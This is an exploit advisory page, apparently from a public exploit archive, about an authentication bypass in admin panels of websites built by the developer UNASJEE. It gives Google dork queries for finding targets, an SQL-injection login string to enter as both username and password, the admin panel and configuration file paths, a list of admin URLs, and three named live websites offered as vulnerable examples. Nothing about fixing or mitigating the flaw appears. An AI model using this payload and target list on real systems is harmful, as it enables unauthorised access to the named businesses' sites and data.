Design and Developed By UNASJEE Authentication Bypass Vulnerability

2018.09.22

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592

Dork: intext:''Designed & Developed by: UNASJEE'' - intext:''Developed by: UNASJEE''

#################################################################################################

# Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/09/2018
# Vendor Homepage : unasjee.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]

#################################################################################################

# Google Dork  : 

intext:''Designed & Developed by: UNASJEE''

intext:''Developed by: UNASJEE''

# Admin Control Panel Path : /admincp/index.php

# Exploit : 

Admin Username : '=''or'

Admin Password : '=''or'

# Configuration File Directory Path : /admincp/config.inc

# Useable Admin Control Panel URL Links => 

/admincp/mmainsections.php
/admincp/edititem.php
/admincp/allproducts2.php?sort=isNew
/admincp/allproducts2.php?sort=isSug
/admincp/allproducts.php?sort=order%20by%20ItmName
/admincp/allproducts.php?sort=order%20by%20ArtNo
/admincp/allproducts2.php?sort=soption
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editemail2.php
/admincp/newsletters.php
/admincp/links.php
/admincp/sendnewsletters.php
/admincp/changepass.php
/admincp/profile.php
/admincp/contact2.php
/admincp/f-view.php
/admincp/ani.php

# Directory File Paths => 

/admincp/sdata/itmimgs/....
/admincp/sdata/banner/.... 
/admincp/sdata/fviewimgs/...
/admincp/sdata/itmimgs/...
/admincp/sdata/mainimgs/...
/admincp/sdata/mimgs/...
/admincp/sdata/msecimgs/...	 
/admincp/sdata/nextimgs/...
/admincp/sdata/secbanner/...	 
/admincp/sdata/secimgs/.. 
/admincp/sdata/subimgs/...

#################################################################################################

# Example Vulnerable Sites => 

tbshandtools.com/admincp/index.php  => [ Proof of Concept ] => archive.is/3fTzD

chableather.com/admincp/index.php

fadensports.com/admincp/config.inc

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

References:

https://www.cyberizm.org/cyberizm-design-by-unasjee-authentication-bypass-vuln.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Design and Developed By UNASJEE Authentication Bypass Vulnerability

Dork: intext:''Designed & Developed by: UNASJEE'' - intext:''Developed by: UNASJEE''

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.